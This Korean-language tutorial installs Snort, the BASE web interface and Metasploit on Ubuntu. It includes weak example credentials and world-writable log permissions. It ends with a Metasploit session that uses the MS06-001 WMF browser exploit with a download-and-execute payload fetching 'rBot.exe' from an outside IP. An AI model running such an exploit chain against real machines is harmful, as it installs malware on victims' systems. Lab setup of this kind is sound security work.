ubuntu 환경에 SNORT & BASE & Metasploit 설치

1. 컴파일러 설치

apt-get install gcc
apt-get install g++
apt-get install make
apt-get install m4
apt-get install flex
apt-get install bison
apt-get install libc6-dev

 

2. libpcap 설치

wget www.tcpdump.org/release/libpcap-1.1.1.tar.gz
root@ubuntu:~/down# cd libpcap-1.1.1
root@ubuntu:~/down# ./configure
root@ubuntu:~/down# make && make install

 

3. pcre 설치

wget ftp://ftp.csx.cam.ac.uk/pub/software/programming/pcre/pcre-8.30.tar.gz
root@ubuntu:~/down/pcre-8.10# ./configure
root@ubuntu:~/down/pcre-8.10# make && make install

 

4. mysql 설정 (mysql 설치 방법은 http://blog.naver.com/leopit/140154575158 참조)

mysql> CREATE DATABASE snort;
mysql> grant CREATE, INSERT, SELECT, UPDATE on snort.* to snort@localhost;
mysql> grant CREATE, INSERT, SELECT, UPDATE on snort.* to snort;
mysql> SET PASSWORD FOR snort@localhost=PASSWORD('snort-db');
mysql> flush privileges;

mysql> show grants for snort@localhost;

+--------------------------------------------------------------------------------------------------+ | Grants for snort@localhost | +--------------------------------------------------------------------------------------------------+ | GRANT USAGE ON *.* TO 'snort'@'localhost' IDENTIFIED BY PASSWORD '*41D58FEF5E7399DB002ACCB899DDB70B7395E774' |  | GRANT SELECT, INSERT, UPDATE, CREATE ON `snort`.* TO 'snort'@'localhost' | +--------------------------------------------------------------------------------------------------+

5. snort-mysql 설치

apt-get install snort-mysql 

 

6. snort 환경설정 파일 수정
vi /etc/snort/database.conf 

#output database: log, mysql, output database: alert, mysql, user=snort password=snort-db dbname=snort host=localhost

 

7. Snort DB 테이블 생성

cd /usr/share/doc/snort-mysql/
zcat create_mysql.gz | mysql -u snort -D snort -psnort-db
rm /etc/snort/db-pending-config

 

8. 로그파일 권한 수정

ls -al /var/log/snort/alert
chown snort /var/log/snort/alert
chmod 666 /var/log/snort/alert

 

9. 데몬 재시작

/etc/init.d/snort start

 

10. BASE 다운로드 및 설치

downloads.sourceforge.net에서 adodb 다운로드

cp -r /root/down/adodb5 /var/www/adodb/

 

base.secureideas.net 에서 base 다운로드

cp -r /root/down/base-1.4.5 /var/www/base

 

브라우저에서 http://localhost/base/setup/index.php 접근 (설치페이지)

adodb 경로 : /var/www/adodb 입력

각종 접근 정보 입력

 

base_conf.php 생성

 

http://localhost/base/base_main.php 접근후 최종 확인

 

11. Metasploit 설치

$ sudo apt-get install subversion ruby rubygems libopenssl-ruby 
$ svn co https://www.metasploit.com/svn/framework3/trunk/
$ mv trunk metasploit

 

테스트예)
msf > use windows/browser/ms06_001_wmf_setabortproc

msf > set payload windows/download_exec

msf > set URL http://20.30.40.234/rBot.exe

msf > set SRVHOST 20.30.40.222

msf > set LHOST 20.30.40.222

msf > set URIPATH attack.html

msf > exploit